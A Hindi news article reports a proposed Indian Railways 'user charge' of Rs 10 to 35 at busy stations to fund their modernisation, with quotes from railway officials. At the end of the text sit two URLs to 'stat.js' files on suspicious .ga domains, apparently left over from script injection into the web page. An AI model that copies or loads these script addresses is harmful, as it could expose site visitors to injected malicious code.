रेलवे प्रशासन ने रेलवे स्टेशनों का विकास और आधुनिकीकरण करने की योजना बनाई है लेकिन इससे आम आदमी की बढ़ सकती हैं मुश्किलें| आपको बता दें, रेलवे यात्रियों से 10 से लेकर 35 रुपये तक अधिक किराया वसूला जा सकता है और उस राशि से रेलवे कई स्टेशनों का विकास और उनका आधुनिकरण करेगा। खबरों के मुताबिक, इस 10 से लेकर 35 रुपये के अतिरिक्त किराए को यूजर चार्ज का नाम दिया जाएगा। यूजर चार्ज ट्रेनों की अलग अलग श्रेढियों क लिए अलग अलग वसूला जाएगा। बताया जा रहा है कि रेलवे प्रशासन द्वारा इस तरह के प्रस्ताव को रेलवे द्वारा अंतिम रुप दिया जा रहा है, लेकिन अभी यह पारित नहीं किया गया है।

 

 

शीघ्र ही इसे मंजूरी के लिए कैबिनेट के पास भेजा जाएगा। इसे अलग-अलग श्रेणियों के लिए अलग-अलग वसूला जाएगा। उदाहरण के तौर पर एसी फर्स्ट क्लास के यात्रियों से ज्यादा यूजर चार्ज लिया जाएगा। रेलवे प्रशासन ने स्पष्ट किया है कि यूजर चार्ज सभी यात्रियों से नहीं लिया जाएगा। यूजर चार्ज केवल उन स्टेशनों के लिए लिया जाएगा जिनका विकास करना है और जहां यात्रियों की संख्या अधिक होती है। रेलवे द्वारा बताया गया है कि देश भर में कुल 7000 स्टेशनों में से करीब 700 से 1000 स्टेशन इस श्रेणी में आते हैं।

 

 

आपको बता दें, रेलवे बोर्ड के सीईओ वीके यादव ने भी पिछले सप्ताह एक प्रेस कॉन्फ्रेंस में बताया था कि यूजर चार्ज सभी 7000 स्टेशनों के यात्रियों से नहीं लिया जाएगा लेकिन अगले 5 वर्ष तक यात्रियों की ज्यादा संख्या वाले बड़े स्टेशनों पर या शुल्क लिया जाएगा। इस संबंध में रेल मंत्रालय के प्रवक्ता ने कहा कि यूजर चार्ज एक छोटी राशि है जिसका इस्तेमाल रेलवे स्टेशनों पर सभी यात्रियों की सुविधाओं को बढ़ाने में किया जाता है।

 

प्रवक्ता ने कहा कि मामला विचाराधीन है और यूजर चार्ज की राशि के बारे में अभी अंतिम निर्णय नहीं लिया गया है| उन्होंने आगे कहा, लेकिन एक बात तय है कि यह यूजर चार्ज न्यूनतम होंगे और यात्रियों के लिए भार नहीं होंगे।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.